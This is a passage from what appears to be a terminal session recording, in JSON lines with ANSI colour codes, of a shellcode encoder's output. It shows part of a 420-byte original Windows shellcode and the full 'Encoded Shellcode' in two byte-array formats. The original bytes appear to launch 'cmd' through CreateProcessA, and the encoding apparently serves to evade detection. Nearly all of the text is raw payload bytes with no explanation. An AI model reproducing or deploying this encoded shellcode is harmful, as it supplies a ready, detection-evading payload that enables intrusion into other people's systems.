;36m83\u001b[0m\u001b[0;36mc4\u001b[0m\u001b[0;36m14\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mdb\u001b[0m\u001b[0;36m80\u001b[0m\u001b[0;36mc3\u001b[0m\u001b[0;36m04\u001b[0m\u001b[0;36m6b\u001b[0m\u001b[0;36mdb\u001b"]
[2.77177, "o", "[0m\u001b[0;36m62\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m14\u001b[0m\u001b[0;36m1c\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m73\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m81\u001b[0m\u001b[0;36m6c\u001b[0m\u001b[0;36m24\u001b[0m\u001b[0;36m02\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m00\u001b[0m\u001b[0;36m00\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m6f\u001b[0m\u001b[0;36m63\u001b[0m\u001b[0;36m65\u001b[0m\u001b[0;36m73\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m74\u001b[0m\u001b[0;36m65\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m43\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m65\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m54\u001b[0m\u001b[0;36m89\u001b[0m\u001b[0;36mf5\u001b[0m\u001b[0;36m55\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md2\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m8d\u001b[0m\u001b[0;36m28\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m63\u001b[0m\u001b[0;36m6d\u001b[0m\u001b[0;36m64\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36m83\u001b[0m\u001b[0;36m6c\u001b[0m\u001b[0;36m24\u001b[0m\u001b[0;36m03\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m89\u001b[0m\u001b[0;36me1\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36md2\u001b[0m\u001b[0;36m83\u001b[0m\u001b[0;36mec\u001b[0m\u001b[0;36m10\u001b[0m\u001b[0;36m89\u001b[0m\u001b[0;36me3\u001b[0m\u001b[0;36m57\u001b[0m\u001b[0;36m57\u001b[0m\u001b[0;36m57\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mc0\u001b[0m\u001b[0;36m40\u001b[0m\u001b[0;36mc1\u001b[0m\u001b[0;36mc0\u001b[0m\u001b[0;36m08\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m"]
[2.771779, "o", "52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mc0\u001b[0m\u001b[0;36m04\u001b[0m\u001b[0;36m2c\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m89\u001b[0m\u001b[0;36me0\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mc0\u001b[0m\u001b[0;36m40\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m51\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md5\u001b[0m\u001b[01;33m\r\n"]
[2.771797, "o", "\r\n"]
[2.771818, "o", "[-] Original Shellcode Length : 420"]
[2.771834, "o", "\r\n"]
[2.771856, "o", "\u001b[0m\u001b[0;32m"]
[2.771871, "o", "\r\n"]
[2.771887, "o", "\r\n"]
[2.771906, "o", "********************************************\u001b[0m\u001b[01;33m"]
[2.771921, "o", "\r\n"]
[2.771937, "o", "\r\n"]
[2.771952, "o", "[-] Encoded Shellcode:"]
[2.771967, "o", "\r\n"]
[2.771985, "o", "\r\n"]
[2.772015, "o", "\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xc7,\u001b[0m\u001b[01;34m0x6a,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x3e,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x4e,\u001b[0m\u001b[01;34m0x02,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x7e,\u001b[0m\u001b[01;34m0x1a,\u001b[0m\u001b[01;34m0xa3,\u001b[0m\u001b[01;34m0x98,\u001b[0m\u001b[01;34m0xa3,\u001b[0m\u001b[01;34m0x98,\u001b[0m\u001b[01;34m0xa3,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x56,\u001b[0m\u001b[01;34m0x1e,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x32,\u001b[0m\u001b[01;34m0x0f,\u001b[0m\u001b[01;34m0xd4,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x76,\u001b[0m\u001b[01;34m0x0f,\u001b[0m\u001b[01;34m0xd4,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x2e,\u001b[0m\u001b[01;34m0x0f,\u001b[0m\u001b[01;34m0xd0,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xc7,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0xa3,\u001b[0m\u001b[01;34m0x0f,\u001b[0m\u001b[01;34m0xd6,\u001b[0m\u001b[01;34m0x8f,\u001b[0m\u001b[01;34m0x36,\u001b[0m\u001b[01;34m0x49,\u001b[0m\u001b[01;34m0x6b,\u001b[0m\u001b[01;34m0x7a,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x7b,\u001b[0m\u001b[01;34m0xfa,\u001b[0m\u001b[01;34m0x8f,\u001b[0m\u001b[01;34m0x76,\u001b[0m\u001b[01;34m0x0a,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x61,\u001b[0m\u001b[01;34m0x6d,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x7b,\u001b[0m\u001b[01;34m0xe5,\u001b[0m\u001b[01;34m0x8f,\u001b[0m\u001b[01;34m0x76,\u001b[0m"]
[2.772046, "o", "\u001b[01;34m0x06,\u001b[0m\u001b[01;34m0x6a,\u001b[0m\u001b[01;34m0x6a,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x6b,\u001b[0m\u001b[01;34m0x7b,\u001b[0m\u001b[01;34m0xec,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x2a,\u001b[0m\u001b[01;34m0x0f,\u001b[0m\u001b[01;34m0xd0,\u001b[0m\u001b[01;34m0x68,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x02,\u001b[0m\u001b[01;34m0x40,\u001b[0m\u001b[01;34m0x47,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x12,\u001b[0m\u001b[01;34m0x0f,\u001b[0m\u001b[01;34m0xd0,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x1a,\u001b[0m\u001b[01;34m0x80,\u001b[0m\u001b[01;34m0x0f,\u001b[0m\u001b[01;34m0xd4,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xc7,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5f,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x77,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x42,\u001b[0m\u001b[01;34m0x67,\u001b[0m\u001b[01;34m0x6c,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x42,\u001b[0m\u001b[01;34m0x61,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x6a,\u001b[0m\u001b[01;34m0x5a,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x87,\u001b[0m\u001b[01;34m0xd0,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xdc,\u001b[0m\u001b[01;34m0x8d,\u001b[0m\u001b[01;34m0xca,\u001b[0m\u001b[01;34m0x02,\u001b[0m\u001b[01;34m0x54,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x68,\u001b[0m\u001b[01"]
[2.77208, "o", ";34m0xb4,\u001b[0m\u001b[01;34m0x62,\u001b[0m\u001b[01;34m0x62,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x3d,\u001b[0m\u001b[01;34m0x3c,\u001b[0m\u001b[01;34m0x20,\u001b[0m\u001b[01;34m0x6a,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x79,\u001b[0m\u001b[01;34m0x7d,\u001b[0m\u001b[01;34m0x3c,\u001b[0m\u001b[01;34m0x51,\u001b[0m\u001b[01;34m0x5a,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xde,\u001b[0m\u001b[01;34m0x8d,\u001b[0m\u001b[01;34m0xca,\u001b[0m\u001b[01;34m0x1e,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x5a,\u001b[0m\u001b[01;34m0x2a,\u001b[0m\u001b[01;34m0x0a,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x7b,\u001b[0m\u001b[01;34m0x7e,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x68,\u001b[0m\u001b[01;34m0x8f,\u001b[0m\u001b[01;34m0x62,\u001b[0m\u001b[01;34m0x2a,\u001b[0m\u001b[01;34m0x0c,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x7a,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x7a,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x59,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x5a,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x87,\u001b[0m\u001b[01;34m0xc9,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xdc,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xd5,\u001b[0m\u001b[01;34m0x68,\u001b[0m\u001b[01;34m0xb5,\u001b[0m\u001b[01;34m0x9e,\u001b[0m\u001b[01;34m0x0f,\u001b[0m\u001b[01;34m0x27,\u001b[0m\u001b[01;34m0xd2,\u001b[0m\u001b[01;34m"]
[2.772111, "o", "0x5a,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xde,\u001b[0m\u001b[01;34m0x8d,\u001b[0m\u001b[01;34m0xca,\u001b[0m\u001b[01;34m0x1e,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xd5,\u001b[0m\u001b[01;34m0x8e,\u001b[0m\u001b[01;34m0xcd,\u001b[0m\u001b[01;34m0x0a,\u001b[0m\u001b[01;34m0x65,\u001b[0m\u001b[01;34m0xd5,\u001b[0m\u001b[01;34m0x6a,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x1a,\u001b[0m\u001b[01;34m0x12,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x7a,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x68,\u001b[0m\u001b[01;34m0x8f,\u001b[0m\u001b[01;34m0x62,\u001b[0m\u001b[01;34m0x2a,\u001b[0m\u001b[01;34m0x0c,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x61,\u001b[0m\u001b[01;34m0x6d,\u001b[0m\u001b[01;34m0x65,\u001b[0m\u001b[01;34m0x6b,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x59,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x5a,\u001b[0m\u001b[01;34m0x87,\u001b[0m\u001b[01;34m0xf6,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xdc,\u001b[0m\u001b[01;34m0x59,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xc7,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0xbc,\u001b[0m\u001b[01;34m0x08,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x5f,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x5f,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xde"]
[2.772213, "o", ",\u001b[0m\u001b[01;34m0x9f,\u001b[0m\u001b[01;34m0x51,\u001b[0m\u001b[01;34m0x8d,\u001b[0m\u001b[01;34m0xca,\u001b[0m\u001b[01;34m0x1e,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xd5,\u001b[0m\u001b[01;34m0x8e,\u001b[0m\u001b[01;34m0xcd,\u001b[0m\u001b[01;34m0x0a,\u001b[0m\u001b[01;34m0x65,\u001b[0m\u001b[01;34m0xd5,\u001b[0m\u001b[01;34m0x6d,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x1a,\u001b[0m\u001b[01;34m0x12,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x6b,\u001b[0m\u001b[01;34m0x6d,\u001b[0m\u001b[01;34m0x7a,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x68,\u001b[0m\u001b[01;34m0x8d,\u001b[0m\u001b[01;34m0x62,\u001b[0m\u001b[01;34m0x2a,\u001b[0m\u001b[01;34m0x0d,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x6d,\u001b[0m\u001b[01;34m0x61,\u001b[0m\u001b[01;34m0x60,\u001b[0m\u001b[01;34m0x60,\u001b[0m\u001b[01;34m0x5a,\u001b[0m\u001b[01;34m0x59,\u001b[0m\u001b[01;34m0x89,\u001b[0m\u001b[01;34m0xc3,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xdc,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0xce,\u001b[0m\u001b[01;34m0xa6,\u001b[0m\u001b[01;34m0xc7,\u001b[0m\u001b[01;34m0x05,\u001b[0m\u001b[01;34m0x68,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x1f,\u001b[0m\u001b[01;34m0x52,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xd5,\u001b[0m\u001b[01;34m0x8e,\u001b[0m\u001b[01;34m0xcd,\u001b[0m\u001b[01;34m0x0c,\u001b[0m\u001b[01;34m0x68,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x87,\u001b[0m\u001b[01;34m0xec,\u001b[0m\u001b[01;34m0x64,\u001b[0m\u001b[01;34m0x1e,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5b,\u001b[0"]
[2.772252, "o", "m\u001b[01;34m0x89,\u001b[0m\u001b[01;34m0xe1,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xde,\u001b[0m\u001b[01;34m0x8d,\u001b[0m\u001b[01;34m0xca,\u001b[0m\u001b[01;34m0x1a,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xd5,\u001b[0m\u001b[01;34m0x8e,\u001b[0m\u001b[01;34m0xcd,\u001b[0m\u001b[01;34m0x0a,\u001b[0m\u001b[01;34m0x65,\u001b[0m\u001b[01;34m0xd5,\u001b[0m\u001b[01;34m0x6c,\u001b[0m\u001b[01;34m0x85,\u001b[0m\u001b[01;34m0x1a,\u001b[0m\u001b[01;34m0x12,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x7d,\u001b[0m\u001b[01;34m0x4f,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x8f,\u001b[0m\u001b[01;34m0x62,\u001b[0m\u001b[01;34m0x2a,\u001b[0m\u001b[01;34m0x0c,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x0e,\u001b[0m\u001b[01;34m0x0e,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x61,\u001b[0m\u001b[01;34m0x6d,\u001b[0m\u001b[01;34m0x6b,\u001b[0m\u001b[01;34m0x7d,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x7a,\u001b[0m\u001b[01;34m0x6b,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x4d,\u001b[0m\u001b[01;34m0x7c,\u001b[0m\u001b[01;34m0x6b,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x5a,\u001b[0m\u001b[01;34m0x87,\u001b[0m\u001b[01;34m0xfb,\u001b[0m\u001b[01;34m0x5b,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xdc,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x83,\u001b[0m\u001b[01;34m0x26,\u001b[0m\u001b[01;34m0x66,\u001b[0m\u001b[01;34m0x6d,\u001b[0m\u001b[01;34m0x63,\u001b[0m\u001b[01;34m0x6a,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[0"]
[2.772286, "o", "1;34m0x68,\u001b[0m\u001b[01;34m0x8d,\u001b[0m\u001b[01;34m0x62,\u001b[0m\u001b[01;34m0x2a,\u001b[0m\u001b[01;34m0x0d,\u001b[0m\u001b[01;34m0x6f,\u001b[0m\u001b[01;34m0x87,\u001b[0m\u001b[01;34m0xef,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xdc,\u001b[0m\u001b[01;34m0x8d,\u001b[0m\u001b[01;34m0xe2,\u001b[0m\u001b[01;34m0x1e,\u001b[0m\u001b[01;34m0x87,\u001b[0m\u001b[01;34m0xed,\u001b[0m\u001b[01;34m0x59,\u001b[0m\u001b[01;34m0x59,\u001b[0m\u001b[01;34m0x59,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xce,\u001b[0m\u001b[01;34m0x4e,\u001b[0m\u001b[01;34m0xcf,\u001b[0m\u001b[01;34m0xce,\u001b[0m\u001b[01;34m0x06,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xce,\u001b[0m\u001b[01;34m0x0a,\u001b[0m\u001b[01;34m0x22,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x87,\u001b[0m\u001b[01;34m0xee,\u001b[0m\u001b[01;34m0x5d,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x3f,\u001b[0m\u001b[01;34m0xce,\u001b[0m\u001b[01;34m0x4e,\u001b[0m\u001b[01;34m0x5e,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0x5f,\u001b[0m\u001b[01;34m0x5c,\u001b[0m\u001b[01;34m0xf1,\u001b[0m\u001b[01;34m0xdb,\u001b[0m"]
[2.772623, "o", "\r\n\r\n\u001b[0;32m----------------------\r\n\r\n\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xc7\u001b[0m\u001b[01;34m\\x6a\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x3e\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x4e\u001b[0m\u001b[01;34m\\x02\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x7e\u001b[0m\u001b[01;34m\\x1a\u001b[0m\u001b[01;34m\\xa3\u001b[0m\u001b[01;34m\\x98\u001b[0m\u001b[01;34m\\xa3\u001b[0m\u001b[01;34m\\x98\u001b[0m\u001b[01;34m\\xa3\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x56\u001b[0m\u001b[01;34m\\x1e\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x32\u001b[0m\u001b[01;34m\\x0f\u001b[0m\u001b[01;34m\\xd4\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x76\u001b[0m\u001b[01;34m\\x0f\u001b[0m\u001b[01;34m\\xd4\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x2e\u001b[0m\u001b[01;34m\\x0f\u001b[0m\u001b[01;34m\\xd0\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xc7\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\xa3\u001b[0m\u001b[01;34m\\x0f\u001b[0m\u001b[01;34m\\xd6\u001b[0m\u001b[01;34m\\x8f\u001b[0m\u001b[01;34m\\x36\u001b[0m\u001b[01;34m\\x49\u001b[0m\u001b[01;34m\\x6b\u001b[0m\u001b[01;34m\\x7a\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x7b\u001b[0m\u001b[01;34m\\xfa\u001b[0m\u001b[01;34m\\x8f\u001b[0m\u001b[01;34m\\x76\u001b[0m\u001b[01;34m\\x0a\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x61\u001b[0m\u001b[01;34m\\x6d\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x7b\u001b[0m\u001b[01;34m\\xe5\u001b[0m\u001b[01;34m\\x8f\u001b[0m\u001b[01;34m\\x76\u001b[0m\u001b[01;34m\\x06\u001b[0m\u001b[01;34"]
[2.772655, "o", "m\\x6a\u001b[0m\u001b[01;34m\\x6a\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x6b\u001b[0m\u001b[01;34m\\x7b\u001b[0m\u001b[01;34m\\xec\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x2a\u001b[0m\u001b[01;34m\\x0f\u001b[0m\u001b[01;34m\\xd0\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x02\u001b[0m\u001b[01;34m\\x40\u001b[0m\u001b[01;34m\\x47\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x12\u001b[0m\u001b[01;34m\\x0f\u001b[0m\u001b[01;34m\\xd0\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x1a\u001b[0m\u001b[01;34m\\x80\u001b[0m\u001b[01;34m\\x0f\u001b[0m\u001b[01;34m\\xd4\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xc7\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x5f\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x77\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x42\u001b[0m\u001b[01;34m\\x67\u001b[0m\u001b[01;34m\\x6c\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x42\u001b[0m\u001b[01;34m\\x61\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x6a\u001b[0m\u001b[01;34m\\x5a\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x87\u001b[0m\u001b[01;34m\\xd0\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xdc\u001b[0m\u001b[01;34m\\x8d\u001b[0m\u001b[01;34m\\xca\u001b[0m\u001b[01;34m\\x02\u001b[0m\u001b[01;34m\\x54\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\xb4\u001b[0m\u001b[01;34m\\x62\u001b[0m\u001b[01;34m\\x62\u001b[0m\u001b[01;34m\\x5c\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34"]
[2.772667, "o", "m\\x3d\u001b[0m\u001b[01;34m\\x3c\u001b[0m\u001b[01;34m\\x20\u001b[0m\u001b[01;34m\\x6a\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x79\u001b[0m\u001b[01;34m\\x7d\u001b[0m\u001b[01;34m\\x3c\u001b[0m\u001b[01;34m\\x51\u001b[0m\u001b[01;34m\\x5a\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xde\u001b[0m\u001b[01;34m\\x8d\u001b[0m\u001b[01;34m\\xca\u001b[0m\u001b[01;34m\\x1e\u001b[0m\u001b[01;34m\\x85\u001b[0m\u001b[01;34m\\x5a\u001b[0m\u001b[01;34m\\x2a\u001b[0m\u001b[01;34m\\x0a\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x7b\u001b[0m\u001b[01;34m\\x7e\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\x8f\u001b[0m\u001b[01;34m\\x62\u001b[0m\u001b[01;34m\\x2a\u001b[0m\u001b[01;34m\\x0c\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x7a\u001b[0m\u001b[01;34m\\x6f\u001b[0m\u001b[01;34m\\x7c\u001b[0m\u001b[01;34m\\x7a\u001b[0m\u001b[01;34m\\x66\u001b[0m\u001b[01;34m\\x59\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x4f\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\x5a\u001b[0m\u001b[01;34m\\x5e\u001b[0m\u001b[01;34m\\x87\u001b[0m\u001b[01;34m\\xc9\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xdc\u001b[0m\u001b[01;34m\\x3f\u001b[0m\u001b[01;34m\\xd5\u001b[0m\u001b[01;34m\\x68\u001b[0m\u001b[01;34m\\xb5\u001b[0m\u001b[01;34m\\x9e\u001b[0m\u001b[01;34m\\x0f\u001b[0m\u001b[01;34m\\x27\u001b[0m\u001b[01;34m\\xd2\u001b[0m\u001b[01;34m\\x5a\u001b[0m\u001b[01;34m\\x5d\u001b[0m\u001b[01;34m\\xf1\u001b[0m\u001b[01;34m\\xde\u001b[0m\u001b[01;34m\\x8d\u001b[0m\u001b[01;34m\\xca\u001b[0m\u001b[01;34m\\x1e\u001b[0m\u001b[01;34m\\x3f\u001b[0m